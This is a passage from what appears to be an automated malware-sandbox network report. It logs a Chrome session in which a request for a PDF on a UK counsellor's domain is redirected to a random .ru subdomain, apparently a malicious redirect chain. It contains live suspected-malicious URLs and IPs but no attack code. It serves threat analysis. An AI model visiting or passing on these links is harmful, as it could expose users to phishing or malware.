Mar 25, 2025 02:09:27.900626898 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.900662899 CET	49733	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:27.900787115 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.900836945 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.900863886 CET	49733	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:27.900876045 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.900914907 CET	49733	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:27.900935888 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.901000023 CET	49733	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:27.901012897 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.901161909 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.901238918 CET	49733	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:27.901599884 CET	49733	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:27.901631117 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:28.037695885 CET	49738	443	192.168.2.4	151.101.194.137
Mar 25, 2025 02:09:28.037786007 CET	443	49738	151.101.194.137	192.168.2.4
Mar 25, 2025 02:09:28.037893057 CET	49738	443	192.168.2.4	151.101.194.137
Mar 25, 2025 02:09:28.038078070 CET	49738	443	192.168.2.4	151.101.194.137
Mar 25, 2025 02:09:28.038099051 CET	443	49738	151.101.194.137	192.168.2.4
Mar 25, 2025 02:09:28.234225035 CET	443	49738	151.101.194.137	192.168.2.4
Mar 25, 2025 02:09:28.234333992 CET	49738	443	192.168.2.4	151.101.194.137
Mar 25, 2025 02:09:28.372386932 CET	49738	443	192.168.2.4	151.101.194.137
Mar 25, 2025 02:09:28.372430086 CET	443	49738	151.101.194.137	192.168.2.4
Mar 25, 2025 02:09:28.373323917 CET	443	49738	151.101.194.137	192.168.2.4
Mar 25, 2025 02:09:28.394804001 CET	49678	443	192.168.2.4	20.189.173.27
Mar 25, 2025 02:09:28.423609018 CET	49738	443	192.168.2.4	151.101.194.137
Mar 25, 2025 02:09:28.639010906 CET	49738	443	192.168.2.4	151.101.194.137
Mar 25, 2025 02:09:28.680347919 CET	443	49738	151.101.194.137	192.168.2.4
Mar 25, 2025 02:09:28.699655056 CET	49678	443	192.168.2.4	20.189.173.27
Mar 25, 2025 02:09:28.729793072 CET	443	49738	151.101.194.137	192.168.2.4
Mar 25, 2025 02:09:28.741364956 CET	443	49738	151.101.194.137	192.168.2.4
Mar 25, 2025 02:09:28.741389990 CET	443	49738	151.101.194.137	192.168.2.4
Mar 25, 2025 02:09:28.741432905 CET	443	49738	151.101.194.137	192.168.2.4
Mar 25, 2025 02:09:28.741461039 CET	49738	443	192.168.2.4	151.101.194.137
Mar 25, 2025 02:09:28.741493940 CET	443	49738	151.101.194.137	192.168.2.4
Mar 25, 2025 02:09:28.741528988 CET	49738	443	192.168.2.4	151.101.194.137
Mar 25, 2025 02:09:28.741553068 CET	443	49738	151.101.194.137	192.168.2.4
Mar 25, 2025 02:09:28.741604090 CET	49738	443	192.168.2.4	151.101.194.137
Mar 25, 2025 02:09:28.763027906 CET	443	49738	151.101.194.137	192.168.2.4
Mar 25, 2025 02:09:28.763109922 CET	443	49738	151.101.194.137	192.168.2.4
Mar 25, 2025 02:09:28.763134003 CET	49738	443	192.168.2.4	151.101.194.137
Mar 25, 2025 02:09:28.763155937 CET	443	49738	151.101.194.137	192.168.2.4
Mar 25, 2025 02:09:28.763197899 CET	49738	443	192.168.2.4	151.101.194.137
Mar 25, 2025 02:09:28.809339046 CET	49738	443	192.168.2.4	151.101.194.137
Mar 25, 2025 02:09:28.832523108 CET	443	49738	151.101.194.137	192.168.2.4
Mar 25, 2025 02:09:28.832534075 CET	443	49738	151.101.194.137	192.168.2.4
Mar 25, 2025 02:09:28.832585096 CET	443	49738	151.101.194.137	192.168.2.4
Mar 25, 2025 02:09:28.832603931 CET	49738	443	192.168.2.4	151.101.194.137
Mar 25, 2025 02:09:28.832634926 CET	443	49738	151.101.194.137	192.168.2.4
Mar 25, 2025 02:09:28.832660913 CET	443	49738	151.101.194.137	192.168.2.4
Mar 25, 2025 02:09:28.832681894 CET	49738	443	192.168.2.4	151.101.194.137
Mar 25, 2025 02:09:28.832750082 CET	49738	443	192.168.2.4	151.101.194.137
Mar 25, 2025 02:09:28.842161894 CET	443	49738	151.101.194.137	192.168.2.4
Mar 25, 2025 02:09:28.842180967 CET	443	49738	151.101.194.137	192.168.2.4
Mar 25, 2025 02:09:28.842242002 CET	49738	443	192.168.2.4	151.101.194.137
Mar 25, 2025 02:09:28.842258930 CET	443	49738	151.101.194.137	192.168.2.4
Mar 25, 2025 02:09:28.842288017 CET	49738	443	192.168.2.4	151.101.194.137
Mar 25, 2025 02:09:28.842319012 CET	49738	443	192.168.2.4	151.101.194.137
Mar 25, 2025 02:09:28.858526945 CET	443	49738	151.101.194.137	192.168.2.4
Mar 25, 2025 02:09:28.858546972 CET	443	49738	151.101.194.137	192.168.2.4
Mar 25, 2025 02:09:28.858608961 CET	49738	443	192.168.2.4	151.101.194.137
Mar 25, 2025 02:09:28.858635902 CET	443	49738	151.101.194.137	192.168.2.4
Mar 25, 2025 02:09:28.858664989 CET	49738	443	192.168.2.4	151.101.194.137
Mar 25, 2025 02:09:28.858865023 CET	49738	443	192.168.2.4	151.101.194.137
Mar 25, 2025 02:09:28.862518072 CET	443	49738	151.101.194.137	192.168.2.4
Mar 25, 2025 02:09:28.862601042 CET	49738	443	192.168.2.4	151.101.194.137
Mar 25, 2025 02:09:28.862602949 CET	443	49738	151.101.194.137	192.168.2.4
Mar 25, 2025 02:09:28.862664938 CET	49738	443	192.168.2.4	151.101.194.137
Mar 25, 2025 02:09:28.863661051 CET	49738	443	192.168.2.4	151.101.194.137
Mar 25, 2025 02:09:28.863676071 CET	443	49738	151.101.194.137	192.168.2.4
Mar 25, 2025 02:09:28.975538015 CET	49739	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:28.975600958 CET	443	49739	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:28.975753069 CET	49739	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:28.975914001 CET	49739	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:28.975946903 CET	443	49739	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:29.091208935 CET	49671	443	192.168.2.4	204.79.197.203
Mar 25, 2025 02:09:29.183461905 CET	443	49739	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:29.203206062 CET	49739	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:29.203229904 CET	443	49739	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:29.203363895 CET	49739	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:29.203371048 CET	443	49739	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:29.306755066 CET	49678	443	192.168.2.4	20.189.173.27
Mar 25, 2025 02:09:29.505877972 CET	443	49739	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:29.506019115 CET	443	49739	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:29.506073952 CET	49739	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:29.519125938 CET	49739	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:29.519148111 CET	443	49739	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:29.617839098 CET	49741	443	192.168.2.4	35.190.80.1
Mar 25, 2025 02:09:29.617938995 CET	443	49741	35.190.80.1	192.168.2.4
Mar 25, 2025 02:09:29.618026972 CET	49741	443	192.168.2.4	35.190.80.1
Mar 25, 2025 02:09:29.618177891 CET	49741	443	192.168.2.4	35.190.80.1
Mar 25, 2025 02:09:29.618201971 CET	443	49741	35.190.80.1	192.168.2.4
Mar 25, 2025 02:09:29.819854975 CET	443	49741	35.190.80.1	192.168.2.4
Mar 25, 2025 02:09:29.819947958 CET	49741	443	192.168.2.4	35.190.80.1
Mar 25, 2025 02:09:29.821055889 CET	49741	443	192.168.2.4	35.190.80.1
Mar 25, 2025 02:09:29.821073055 CET	443	49741	35.190.80.1	192.168.2.4
Mar 25, 2025 02:09:29.821466923 CET	443	49741	35.190.80.1	192.168.2.4
Mar 25, 2025 02:09:29.821737051 CET	49741	443	192.168.2.4	35.190.80.1
Mar 25, 2025 02:09:29.868336916 CET	443	49741	35.190.80.1	192.168.2.4
Mar 25, 2025 02:09:30.018606901 CET	443	49741	35.190.80.1	192.168.2.4
Mar 25, 2025 02:09:30.018757105 CET	443	49741	35.190.80.1	192.168.2.4
Mar 25, 2025 02:09:30.018815041 CET	49741	443	192.168.2.4	35.190.80.1
Mar 25, 2025 02:09:30.018887997 CET	49741	443	192.168.2.4	35.190.80.1
Mar 25, 2025 02:09:30.018887997 CET	49741	443	192.168.2.4	35.190.80.1
Mar 25, 2025 02:09:30.018923998 CET	443	49741	35.190.80.1	192.168.2.4
Mar 25, 2025 02:09:30.018975019 CET	49741	443	192.168.2.4	35.190.80.1
Mar 25, 2025 02:09:30.019413948 CET	49742	443	192.168.2.4	35.190.80.1
Mar 25, 2025 02:09:30.019443989 CET	443	49742	35.190.80.1	192.168.2.4
Mar 25, 2025 02:09:30.019489050 CET	49742	443	192.168.2.4	35.190.80.1
Mar 25, 2025 02:09:30.019634008 CET	49742	443	192.168.2.4	35.190.80.1
Mar 25, 2025 02:09:30.019648075 CET	443	49742	35.190.80.1	192.168.2.4
Mar 25, 2025 02:09:30.207818031 CET	443	49742	35.190.80.1	192.168.2.4
Mar 25, 2025 02:09:30.208221912 CET	49742	443	192.168.2.4	35.190.80.1
Mar 25, 2025 02:09:30.208221912 CET	49742	443	192.168.2.4	35.190.80.1
Mar 25, 2025 02:09:30.208247900 CET	443	49742	35.190.80.1	192.168.2.4
Mar 25, 2025 02:09:30.208256006 CET	443	49742	35.190.80.1	192.168.2.4
Mar 25, 2025 02:09:30.419856071 CET	443	49742	35.190.80.1	192.168.2.4
Mar 25, 2025 02:09:30.419969082 CET	443	49742	35.190.80.1	192.168.2.4
Mar 25, 2025 02:09:30.420053959 CET	49742	443	192.168.2.4	35.190.80.1
Mar 25, 2025 02:09:30.420119047 CET	49742	443	192.168.2.4	35.190.80.1
Mar 25, 2025 02:09:30.420130968 CET	443	49742	35.190.80.1	192.168.2.4
Mar 25, 2025 02:09:30.420161963 CET	49742	443	192.168.2.4	35.190.80.1
Mar 25, 2025 02:09:30.420197964 CET	49742	443	192.168.2.4	35.190.80.1
Mar 25, 2025 02:09:30.508577108 CET	49678	443	192.168.2.4	20.189.173.27
Mar 25, 2025 02:09:30.639781952 CET	49708	443	192.168.2.4	52.113.196.254
Mar 25, 2025 02:09:30.729845047 CET	443	49708	52.113.196.254	192.168.2.4
Mar 25, 2025 02:09:30.730925083 CET	443	49708	52.113.196.254	192.168.2.4
Mar 25, 2025 02:09:30.730969906 CET	443	49708	52.113.196.254	192.168.2.4
Mar 25, 2025 02:09:30.731015921 CET	49708	443	192.168.2.4	52.113.196.254
Mar 25, 2025 02:09:30.731028080 CET	443	49708	52.113.196.254	192.168.2.4
Mar 25, 2025 02:09:30.731070042 CET	443	49708	52.113.196.254	192.168.2.4
Mar 25, 2025 02:09:30.731070995 CET	49708	443	192.168.2.4	52.113.196.254
Mar 25, 2025 02:09:30.731108904 CET	49708	443	192.168.2.4	52.113.196.254
Mar 25, 2025 02:09:30.731190920 CET	443	49708	52.113.196.254	192.168.2.4
Mar 25, 2025 02:09:30.731220961 CET	49708	443	192.168.2.4	52.113.196.254
Mar 25, 2025 02:09:30.731226921 CET	443	49708	52.113.196.254	192.168.2.4
Mar 25, 2025 02:09:30.731301069 CET	49708	443	192.168.2.4	52.113.196.254
Mar 25, 2025 02:09:30.731409073 CET	49708	443	192.168.2.4	52.113.196.254
Mar 25, 2025 02:09:30.756140947 CET	49681	80	192.168.2.4	2.17.190.73
Mar 25, 2025 02:09:31.059397936 CET	49681	80	192.168.2.4	2.17.190.73
Mar 25, 2025 02:09:31.132925034 CET	49708	443	192.168.2.4	52.113.196.254
Mar 25, 2025 02:09:31.133405924 CET	49708	443	192.168.2.4	52.113.196.254
Mar 25, 2025 02:09:31.133441925 CET	49708	443	192.168.2.4	52.113.196.254
Mar 25, 2025 02:09:31.227297068 CET	443	49708	52.113.196.254	192.168.2.4
Mar 25, 2025 02:09:31.227339029 CET	443	49708	52.113.196.254	192.168.2.4
Mar 25, 2025 02:09:31.228370905 CET	443	49708	52.113.196.254	192.168.2.4
Mar 25, 2025 02:09:31.228406906 CET	443	49708	52.113.196.254	192.168.2.4
Mar 25, 2025 02:09:31.228460073 CET	49708	443	192.168.2.4	52.113.196.254
Mar 25, 2025 02:09:31.228506088 CET	49708	443	192.168.2.4	52.113.196.254
Mar 25, 2025 02:09:31.229999065 CET	443	49708	52.113.196.254	192.168.2.4
Mar 25, 2025 02:09:31.230096102 CET	443	49708	52.113.196.254	192.168.2.4
Mar 25, 2025 02:09:31.230153084 CET	49708	443	192.168.2.4	52.113.196.254
Mar 25, 2025 02:09:31.241600037 CET	49708	443	192.168.2.4	52.113.196.254
Mar 25, 2025 02:09:31.260957956 CET	49708	443	192.168.2.4	52.113.196.254
Mar 25, 2025 02:09:31.332650900 CET	443	49708	52.113.196.254	192.168.2.4
Mar 25, 2025 02:09:31.352803946 CET	443	49708	52.113.196.254	192.168.2.4
Mar 25, 2025 02:09:31.355618000 CET	443	49708	52.113.196.254	192.168.2.4
Mar 25, 2025 02:09:31.355654955 CET	443	49708	52.113.196.254	192.168.2.4
Mar 25, 2025 02:09:31.355707884 CET	49708	443	192.168.2.4	52.113.196.254
Mar 25, 2025 02:09:31.355727911 CET	49708	443	192.168.2.4	52.113.196.254
Mar 25, 2025 02:09:31.464193106 CET	49744	443	192.168.2.4	131.253.33.254
Mar 25, 2025 02:09:31.464268923 CET	443	49744	131.253.33.254	192.168.2.4
Mar 25, 2025 02:09:31.464636087 CET	49744	443	192.168.2.4	131.253.33.254
Mar 25, 2025 02:09:31.465496063 CET	49744	443	192.168.2.4	131.253.33.254
Mar 25, 2025 02:09:31.465531111 CET	443	49744	131.253.33.254	192.168.2.4
Mar 25, 2025 02:09:31.665597916 CET	49681	80	192.168.2.4	2.17.190.73
Mar 25, 2025 02:09:31.781090975 CET	443	49744	131.253.33.254	192.168.2.4
Mar 25, 2025 02:09:31.781176090 CET	49744	443	192.168.2.4	131.253.33.254
Mar 25, 2025 02:09:32.803169966 CET	443	49729	142.250.81.228	192.168.2.4
Mar 25, 2025 02:09:32.803307056 CET	443	49729	142.250.81.228	192.168.2.4
Mar 25, 2025 02:09:32.803401947 CET	49729	443	192.168.2.4	142.250.81.228
Mar 25, 2025 02:09:32.869103909 CET	49681	80	192.168.2.4	2.17.190.73
Mar 25, 2025 02:09:32.915960073 CET	49678	443	192.168.2.4	20.189.173.27
Mar 25, 2025 02:09:33.747519016 CET	49729	443	192.168.2.4	142.250.81.228
Mar 25, 2025 02:09:33.747535944 CET	443	49729	142.250.81.228	192.168.2.4
Mar 25, 2025 02:09:35.275193930 CET	49681	80	192.168.2.4	2.17.190.73
Mar 25, 2025 02:09:36.799398899 CET	443	49731	185.199.220.71	192.168.2.4
Mar 25, 2025 02:09:36.799592018 CET	443	49731	185.199.220.71	192.168.2.4
Mar 25, 2025 02:09:36.799918890 CET	49731	443	192.168.2.4	185.199.220.71
Mar 25, 2025 02:09:37.542196035 CET	49731	443	192.168.2.4	185.199.220.71
Mar 25, 2025 02:09:37.542257071 CET	443	49731	185.199.220.71	192.168.2.4
Mar 25, 2025 02:09:37.728743076 CET	49678	443	192.168.2.4	20.189.173.27
Mar 25, 2025 02:09:38.697526932 CET	49671	443	192.168.2.4	204.79.197.203
Mar 25, 2025 02:09:40.088124037 CET	49681	80	192.168.2.4	2.17.190.73
Mar 25, 2025 02:09:47.334203005 CET	49678	443	192.168.2.4	20.189.173.27
Mar 25, 2025 02:09:49.701581955 CET	49681	80	192.168.2.4	2.17.190.73
Mar 25, 2025 02:10:04.134677887 CET	49712	80	192.168.2.4	142.250.65.195
Mar 25, 2025 02:10:04.134728909 CET	49713	80	192.168.2.4	199.232.210.172
Mar 25, 2025 02:10:04.134767056 CET	49715	80	192.168.2.4	199.232.210.172
Mar 25, 2025 02:10:04.223706007 CET	80	49713	199.232.210.172	192.168.2.4
Mar 25, 2025 02:10:04.223721981 CET	80	49715	199.232.210.172	192.168.2.4
Mar 25, 2025 02:10:04.223731041 CET	80	49715	199.232.210.172	192.168.2.4
Mar 25, 2025 02:10:04.223788977 CET	49715	80	192.168.2.4	199.232.210.172
Mar 25, 2025 02:10:04.223834991 CET	80	49713	199.232.210.172	192.168.2.4
Mar 25, 2025 02:10:04.223902941 CET	80	49712	142.250.65.195	192.168.2.4
Mar 25, 2025 02:10:04.223902941 CET	49713	80	192.168.2.4	199.232.210.172
Mar 25, 2025 02:10:04.223970890 CET	49712	80	192.168.2.4	142.250.65.195
Mar 25, 2025 02:10:04.418695927 CET	49714	443	192.168.2.4	23.44.201.4
Mar 25, 2025 02:10:04.419131994 CET	49716	80	192.168.2.4	199.232.210.172
Mar 25, 2025 02:10:22.574341059 CET	49750	443	192.168.2.4	142.250.81.228
Mar 25, 2025 02:10:22.574419975 CET	443	49750	142.250.81.228	192.168.2.4
Mar 25, 2025 02:10:22.574625969 CET	49750	443	192.168.2.4	142.250.81.228
Mar 25, 2025 02:10:22.575325966 CET	49750	443	192.168.2.4	142.250.81.228
Mar 25, 2025 02:10:22.575360060 CET	443	49750	142.250.81.228	192.168.2.4
Mar 25, 2025 02:10:22.773600101 CET	443	49750	142.250.81.228	192.168.2.4
Mar 25, 2025 02:10:22.774009943 CET	49750	443	192.168.2.4	142.250.81.228
Mar 25, 2025 02:10:22.774050951 CET	443	49750	142.250.81.228	192.168.2.4
Mar 25, 2025 02:10:32.831489086 CET	443	49750	142.250.81.228	192.168.2.4
Mar 25, 2025 02:10:32.831614971 CET	443	49750	142.250.81.228	192.168.2.4
Mar 25, 2025 02:10:32.832016945 CET	49750	443	192.168.2.4	142.250.81.228
Mar 25, 2025 02:10:33.746119976 CET	49750	443	192.168.2.4	142.250.81.228
Mar 25, 2025 02:10:33.746171951 CET	443	49750	142.250.81.228	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 25, 2025 02:09:19.747728109 CET	53	64367	1.1.1.1	192.168.2.4
Mar 25, 2025 02:09:19.805144072 CET	53	61625	1.1.1.1	192.168.2.4
Mar 25, 2025 02:09:20.480650902 CET	53	52267	1.1.1.1	192.168.2.4
Mar 25, 2025 02:09:20.635917902 CET	53	52845	1.1.1.1	192.168.2.4
Mar 25, 2025 02:09:22.511293888 CET	64282	53	192.168.2.4	1.1.1.1
Mar 25, 2025 02:09:22.511799097 CET	50340	53	192.168.2.4	1.1.1.1
Mar 25, 2025 02:09:22.608949900 CET	53	64282	1.1.1.1	192.168.2.4
Mar 25, 2025 02:09:22.610663891 CET	53	50340	1.1.1.1	192.168.2.4
Mar 25, 2025 02:09:25.164777994 CET	56351	53	192.168.2.4	1.1.1.1
Mar 25, 2025 02:09:25.165011883 CET	51922	53	192.168.2.4	1.1.1.1
Mar 25, 2025 02:09:25.550425053 CET	53	56351	1.1.1.1	192.168.2.4
Mar 25, 2025 02:09:25.577733040 CET	53	51922	1.1.1.1	192.168.2.4
Mar 25, 2025 02:09:26.319092035 CET	61103	53	192.168.2.4	1.1.1.1
Mar 25, 2025 02:09:26.319391966 CET	51498	53	192.168.2.4	1.1.1.1
Mar 25, 2025 02:09:26.584964991 CET	53	61103	1.1.1.1	192.168.2.4
Mar 25, 2025 02:09:26.753582001 CET	53	51498	1.1.1.1	192.168.2.4
Mar 25, 2025 02:09:27.939024925 CET	53327	53	192.168.2.4	1.1.1.1
Mar 25, 2025 02:09:27.939259052 CET	60224	53	192.168.2.4	1.1.1.1
Mar 25, 2025 02:09:28.036218882 CET	53	60224	1.1.1.1	192.168.2.4
Mar 25, 2025 02:09:28.036987066 CET	53	53327	1.1.1.1	192.168.2.4
Mar 25, 2025 02:09:29.061949015 CET	53	51520	1.1.1.1	192.168.2.4
Mar 25, 2025 02:09:29.518239021 CET	64424	53	192.168.2.4	1.1.1.1
Mar 25, 2025 02:09:29.518616915 CET	51815	53	192.168.2.4	1.1.1.1
Mar 25, 2025 02:09:29.617034912 CET	53	51815	1.1.1.1	192.168.2.4
Mar 25, 2025 02:09:29.617305994 CET	53	64424	1.1.1.1	192.168.2.4
Mar 25, 2025 02:09:37.649310112 CET	53	64721	1.1.1.1	192.168.2.4
Mar 25, 2025 02:09:56.503684998 CET	53	51944	1.1.1.1	192.168.2.4
Mar 25, 2025 02:10:19.033431053 CET	53	52392	1.1.1.1	192.168.2.4
Mar 25, 2025 02:10:19.288393974 CET	53	53223	1.1.1.1	192.168.2.4
Mar 25, 2025 02:10:20.938982010 CET	53	64130	1.1.1.1	192.168.2.4
Mar 25, 2025 02:10:27.736010075 CET	138	138	192.168.2.4	192.168.2.255

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Mar 25, 2025 02:09:26.753701925 CET	192.168.2.4	1.1.1.1	c2e0	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 25, 2025 02:09:22.511293888 CET	192.168.2.4	1.1.1.1	0xae59	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Mar 25, 2025 02:09:22.511799097 CET	192.168.2.4	1.1.1.1	0xa063	Standard query (0)	www.google.com	65	IN (0x0001)	false
Mar 25, 2025 02:09:25.164777994 CET	192.168.2.4	1.1.1.1	0x5b17	Standard query (0)	sallybarmescounsellor.co.uk	A (IP address)	IN (0x0001)	false
Mar 25, 2025 02:09:25.165011883 CET	192.168.2.4	1.1.1.1	0xc38a	Standard query (0)	sallybarmescounsellor.co.uk	65	IN (0x0001)	false
Mar 25, 2025 02:09:26.319092035 CET	192.168.2.4	1.1.1.1	0xe0b6	Standard query (0)	uz5k.vsmaemhjvk.ru	A (IP address)	IN (0x0001)	false
Mar 25, 2025 02:09:26.319391966 CET	192.168.2.4	1.1.1.1	0x4c4f	Standard query (0)	uz5k.vsmaemhjvk.ru	65	IN (0x0001)	false
Mar 25, 2025 02:09:27.939024925 CET	192.168.2.4	1.1.1.1	0xfbd6	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)	false
Mar 25, 2025 02:09:27.939259052 CET	192.168.2.4	1.1.1.1	0x58f9	Standard query (0)	code.jquery.com	65	IN (0x0001)	false
Mar 25, 2025 02:09:29.518239021 CET	192.168.2.4	1.1.1.1	0xa166	Standard query (0)	a.nel.cloudflare.com	A (IP address)	IN (0x0001)	false
Mar 25, 2025 02:09:29.518616915 CET	192.168.2.4	1.1.1.1	0x21f7	Standard query (0)	a.nel.cloudflare.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Mar 25, 2025 02:09:22.608949900 CET	1.1.1.1	192.168.2.4	0xae59	No error (0)	www.google.com	142.250.81.228	A (IP address)	IN (0x0001)	false
Mar 25, 2025 02:09:22.610663891 CET	1.1.1.1	192.168.2.4	0xa063	No error (0)	www.google.com		65	IN (0x0001)	false
Mar 25, 2025 02:09:25.550425053 CET	1.1.1.1	192.168.2.4	0x5b17	No error (0)	sallybarmescounsellor.co.uk	185.199.220.71	A (IP address)	IN (0x0001)	false
Mar 25, 2025 02:09:26.584964991 CET	1.1.1.1	192.168.2.4	0xe0b6	No error (0)	uz5k.vsmaemhjvk.ru	104.21.112.1	A (IP address)	IN (0x0001)	false
Mar 25, 2025 02:09:26.584964991 CET	1.1.1.1	192.168.2.4	0xe0b6	No error (0)	uz5k.vsmaemhjvk.ru	104.21.32.1	A (IP address)	IN (0x0001)	false
Mar 25, 2025 02:09:26.584964991 CET	1.1.1.1	192.168.2.4	0xe0b6	No error (0)	uz5k.vsmaemhjvk.ru	104.21.80.1	A (IP address)	IN (0x0001)	false
Mar 25, 2025 02:09:26.584964991 CET	1.1.1.1	192.168.2.4	0xe0b6	No error (0)	uz5k.vsmaemhjvk.ru	104.21.16.1	A (IP address)	IN (0x0001)	false
Mar 25, 2025 02:09:26.584964991 CET	1.1.1.1	192.168.2.4	0xe0b6	No error (0)	uz5k.vsmaemhjvk.ru	104.21.96.1	A (IP address)	IN (0x0001)	false
Mar 25, 2025 02:09:26.584964991 CET	1.1.1.1	192.168.2.4	0xe0b6	No error (0)	uz5k.vsmaemhjvk.ru	104.21.48.1	A (IP address)	IN (0x0001)	false
Mar 25, 2025 02:09:26.584964991 CET	1.1.1.1	192.168.2.4	0xe0b6	No error (0)	uz5k.vsmaemhjvk.ru	104.21.64.1	A (IP address)	IN (0x0001)	false
Mar 25, 2025 02:09:26.753582001 CET	1.1.1.1	192.168.2.4	0x4c4f	No error (0)	uz5k.vsmaemhjvk.ru		65	IN (0x0001)	false
Mar 25, 2025 02:09:28.036987066 CET	1.1.1.1	192.168.2.4	0xfbd6	No error (0)	code.jquery.com	151.101.194.137	A (IP address)	IN (0x0001)	false
Mar 25, 2025 02:09:28.036987066 CET	1.1.1.1	192.168.2.4	0xfbd6	No error (0)	code.jquery.com	151.101.66.137	A (IP address)	IN (0x0001)	false
Mar 25, 2025 02:09:28.036987066 CET	1.1.1.1	192.168.2.4	0xfbd6	No error (0)	code.jquery.com	151.101.2.137	A (IP address)	IN (0x0001)	false
Mar 25, 2025 02:09:28.036987066 CET	1.1.1.1	192.168.2.4	0xfbd6	No error (0)	code.jquery.com	151.101.130.137	A (IP address)	IN (0x0001)	false
Mar 25, 2025 02:09:29.617305994 CET	1.1.1.1	192.168.2.4	0xa166	No error (0)	a.nel.cloudflare.com	35.190.80.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

sallybarmescounsellor.co.uk

uz5k.vsmaemhjvk.ru

code.jquery.com

a.nel.cloudflare.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49732	185.199.220.71	443	1596	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 01:09:26 UTC	685	OUT	GET /pad4.pdf HTTP/1.1 Host: sallybarmescounsellor.co.uk Connection: keep-alive sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 01:09:26 UTC	397	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Tue, 25 Mar 2025 01:09:26 GMT server: LiteSpeed location: https://uZ5k.vsmaemhjvk.ru/vHFigT/ vary: User-Agent alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2025-03-25 01:09:26 UTC	795	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!importan

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49733	104.21.112.1	443	1596	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
